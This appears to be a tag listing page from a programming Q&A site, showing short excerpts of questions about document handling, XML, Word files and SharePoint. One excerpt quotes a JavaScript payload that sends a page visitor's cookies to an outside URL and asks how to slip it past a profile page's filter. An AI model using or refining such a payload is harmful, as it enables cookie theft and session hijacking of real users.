Is a term that in computer science can refer to various file types containing information usually readable by a human.

learn more… | top users | synonyms

0
votes
1answer
11 views

what is the alternative flow?

Is all happenings that cause errors message or warning message, considered as alternative flow?! For example, the use case ”mission registration” ,the mission place could up to 30 char and if it is ...
0
votes
1answer
14 views

Closing a Jquery Dialog after a Document is returned via ActionResult

I am fairly new to ASP.NET MVC and JQuery, so please bare with me. I have a JQuery Dialog that is used to pass some information to the server. The ActionResult Method then generates a document. This ...
-1
votes
0answers
22 views

Issue in printing the word file with space character (&nbsp) instead it was printing  character [closed]

We are converting a html file input data to word document. In the browser output we were able to see the space but in the downloaded word document we are seeing a special character  instead of a ...
0
votes
0answers
14 views

Can't access documents in Sharepoint

I attempted to install Coldfusion on the same server as Sharepoint and TFS. After the install I could no longer access Sharepoint. I uninstalled Coldfusion and I could again access Sharepoint. ...
0
votes
2answers
20 views

Suggest a documentation tool/method/framework (not a generator)

Are there any tools/frameworks to write documentation manually, preferably with ability to display syntax-highlighted code snippets? In short, I would like to achieve similar results to Sphinx ...
-2
votes
1answer
19 views

How to program with kiwi android programming? [closed]

Sorry if this topic has been already posted. I'm a computer engineering student and I Should develop my thesis with kiwi android programming. as I searched before, there was some issues about ...
0
votes
0answers
15 views

Open source package for sorting, organizing PDFs [closed]

I'm looking for an open source package that either does this, or can be adapted to do this. I have large PDF files containing thousands of pages. There are several discrete documents in this PDF file, ...
0
votes
1answer
23 views

Get JTextArea current row text on Enter Key

Well, this is a small problem maybe, but I couldn't figure it. I want my program display the text in current cursor position when I press the Enter key. Here's my current code: if (evt.getKeyCode() ...
0
votes
0answers
8 views

Another way to post a document location + cookie on a html based profile

Is there another way to post a "document location + cookie" command on a html profile? document.location="http://siteurl.com/cookie.php?"+document.cookie; The profile deletes the last part ...
-1
votes
1answer
27 views

How to convert XML file (String) to a valid document?

I have XML file as a string and i want to convert it to DOM document in order to parse it using XPath, i use this code to convert one String element to DOM element: public Element convert(String xml) ...
0
votes
0answers
16 views

Liferay - Cannot unlock a document already locked by another user

Im using liferay 6.1.2. By using administrator role I tried to unlock a document already unlocked by another user and it failed. I got this error message: You cannot modify this document because it ...
-1
votes
0answers
28 views

Document class methods inside SaveToImage How can the Word document containing multiple pages into images?

Themselves realize this, but did not achieve the desired effect (only the first page into images) Document doc = new Document(templatePath); HandleDoc(doc); MemoryStream dstStream = new ...
0
votes
1answer
36 views

Error in processing paths generated by XML file using XPath

I have XML file andi'm trying to use XPath to get all the values for it's paths, but it doesn't generate values for the NameSpaces like : //rss/channel/item/yweather:forecast/@low OR ...
0
votes
0answers
44 views

Adding shapes at different pages of a MS Word Document in C#

I am currently working on a .NET- Application in Visual Studio 2010. I want to create a MS Word 2010-file using C#. I have already created a new document and inserted some paragraphs. Now I want to ...
0
votes
2answers
32 views

save file to my documents

I want to create a program that saves a bmp picture to my documents and uses that picture as wallpaper. So far I managed to create the program and it runes pretty nice. But one problem, I dont know ...

1 2 3 4 5 82
15 30 50 per page